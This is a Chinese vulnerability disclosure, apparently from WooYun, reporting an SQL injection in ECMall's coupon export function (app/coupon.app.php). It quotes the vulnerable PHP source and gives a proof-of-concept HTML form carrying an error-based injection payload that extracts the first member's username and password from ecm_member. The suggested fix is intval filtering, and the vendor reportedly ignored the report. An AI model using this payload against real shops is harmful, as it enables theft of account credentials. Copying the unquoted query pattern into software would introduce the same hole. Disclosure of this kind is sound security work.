漏洞详情

披露状态:

2013-12-31: 细节已通知厂商并且等待厂商处理中
2014-01-05: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-03-28: 细节向公众公开

简要描述:

快新年了,有礼物木

详细说明:

文件存在app/coupon.app.php

function export()
{
$coupon_id = isset($_GET['id']) ? trim($_GET['id']) : ''; //这里居然不过滤
if (empty($coupon_id))
{
echo Lang::get('no_coupon');
exit;
}
if (!IS_POST)
{
header("Content-Type:text/html;charset=" . CHARSET);
$this->assign('id', $coupon_id);
$this->display('coupon_export.html');
}
else
{
$amount = intval(trim($_POST['amount']));
if (empty($amount))
{
$this->pop_warning('involid_data');
exit;
}
$info = $this->_coupon_mod->get_info($coupon_id);
$coupon_name = ecm_iconv(CHARSET, 'gbk', $info['coupon_name']);
header('Content-type: application/txt');
header('Content-Disposition: attachment; filename="coupon_' .date('Ymd'). '_' .$coupon_name.'.txt"');
$sn_array = $this->generate($amount, $coupon_id);
$crlf = get_crlf();
foreach ($sn_array as $val)
{
echo $val['coupon_sn'] . $crlf;
}
}
}

function extend()
{
$coupon_id = isset($_GET['id']) ? trim($_GET['id']) : ''; //这也不过虑
}



看了一下,发现同时调用了这个方法

function generate($num, $id)
{
$use_times = $this->_coupon_mod->get(array('fields' => 'use_times', 'conditions' => 'store_id = ' . $this->_store_id . ' AND coupon_id = ' . $id)); //这里没有单引号,注入产生了

if ($num > 1000)
{
$num = 1000;
}
if ($num < 1)
{
$num = 1;
}
$times = $use_times['use_times'];
$add_data = array();
$str = '';
$pix = 0;
if (file_exists(ROOT_PATH . '/data/generate.txt'))
{
$s = file_get_contents(ROOT_PATH . '/data/generate.txt');
$pix = intval($s);
}
$max = $pix + $num;
file_put_contents(ROOT_PATH . '/data/generate.txt', $max);
$couponsn = '';
$tmp = '';
$cpm = '';
$str = '';
for ($i = $pix + 1; $i <= $max; $i++ )
{
$cpm = sprintf("%08d", $i);
$tmp = mt_rand(1000, 9999);
$couponsn = $cpm . $tmp;
$str .= "('{$couponsn}', {$id}, {$times}),";
$add_data[] = array(
'coupon_sn' => $couponsn,
'coupon_id' => $id,
'remain_times' => $times,
);
}
$string = substr($str,0, strrpos($str, ','));
$this->_couponsn_mod->db->query("INSERT INTO {$this->_couponsn_mod->table} (coupon_sn, coupon_id, remain_times) VALUES {$string}", 'SILENT');
return $add_data;
}

漏洞证明:

1、首先注册一个商铺并登录,增加一个优惠券

11.png



2.由于是POST注入,为了简单点,就用网页来提交了。

<form action="http://192.168.1.74:8000/ecmall/index.php?app=coupon&act=export&id=1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)%23" method="post">
<table width="960" border="1">
<tr>
<td width="302">&nbsp;</td>
<td width="642">&nbsp;</td>
</tr>
<tr>
<td><h3>导出数量:</h3></td>
<td><label>
<input name="amount" type="text" id="amount" value="1" />
</label></td>
</tr>
<tr>
<td><label>
<div align="right">
<input type="submit" name="Submit" value="提交" />
</div>
</label></td>
<td>&nbsp;</td>
</tr>
</table>
</form>



保存成网页后,在登录IE界面打开这网页并提交,提示下载

222.png



保存后,查看你会发现

333.png



修复方案:

过滤 intval

版权声明:转载请注明来源 kelon@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-01-05 10:47

厂商回复:

最新状态:

暂无


漏洞评价: